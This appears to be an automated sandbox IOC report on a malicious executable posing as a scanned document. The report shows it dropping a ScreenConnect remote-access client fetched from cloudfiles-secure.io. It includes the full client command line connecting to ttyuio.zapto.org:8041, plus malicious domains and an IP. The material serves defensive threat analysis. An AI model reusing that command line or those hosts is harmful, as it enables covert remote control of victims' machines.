IOC Report
Scan_doc_09_16_24_1120.exe

loading gif

Files

File Path
Type
Category
Malicious
Scan_doc_09_16_24_1120.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
 malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xfcf058cc, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Scan_doc_09_16_2_fec9a84a79da4acbbacb686b6265423b65e5331_ff68c4ec_e8d99851-ea41-4aa5-8422-6c4925e08426\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER360C.tmp.dmp
Mini DuMP crash report, 14 streams, Wed Oct 2 04:22:50 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A81.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AFF.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B1D.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BBA.tmp.txt
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
modified
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\app.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\fr4vgpeb.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\CHT0VHXS.log
Unicode text, UTF-16, little-endian text, with very long lines (623), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\VTYYR3JN.ED2\5RJOO8WG.EGV.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\System32\user.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 69 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe
"C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll
178.215.236.119
 malicious
http://schemas.xmlsoap.org/ws/2004/09/policyn
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8
unknown
http://schemas.xmlsoap.org/ws/2004/09/policy1p
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application5
unknown
https://login.l
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationP
unknown
https://login.microsoftonline.com/ppsecure/ResolveUser.srf
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WPj
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationest
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Cli
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application22DW.YBK&
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationV
unknown
http://cloudfiles-secure.io
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationZ
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationX
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config%
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationl
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_n329
unknown
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://Passport.NET/tb_
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationdb01WXG7
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.configPj
unknown
https://account.live.com/msangcwam
unknown
http://www.w3.or
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll/uL
unknown
http://crl.ver)
unknown
http://passport.net/tb
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application.
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClie
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_re=msil
unknown
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.ap
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1
unknown
http://www.w3.ora
unknown
https://login.microsoftonline.com/MSARST2.srf
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srfU
unknown
http://Passport.NET/STS
unknown
http://www.xrml.org/schema/2001/11/xrml2coreS
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationPNT
unknown
http://www.w3.o
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee2
unknown
http://Passport.NET/tb
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
unknown
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
unknown
https://signup.live.com/signup.aspx
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80603
unknown
http://schemas.xmlsoap.org/ws/2004/09/policy
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllPj
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_
unknown
http://www.xrml.org/schema/2001/11/xrml2core
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80604
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationx
unknown
https://login.live.c
unknown
https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
unknown
http://upx.sf.net
unknown
http://schemas.xmlsoap.org/ws/2005/02/scst
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifestt
unknown
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfU
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
unknown
https://account.live.com/Wizard/Password/Change?id=80601
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
unknown
http://schemas.xmlsoap.org/ws/2005/02/sc1e
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
unknown
https://cloudfiles-secure.io
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Win
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServi
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cloudfiles-secure.io
178.215.236.119
 malicious
ttyuio.zapto.org
178.215.236.119
 malicious
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
178.215.236.119
cloudfiles-secure.io
Germany
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
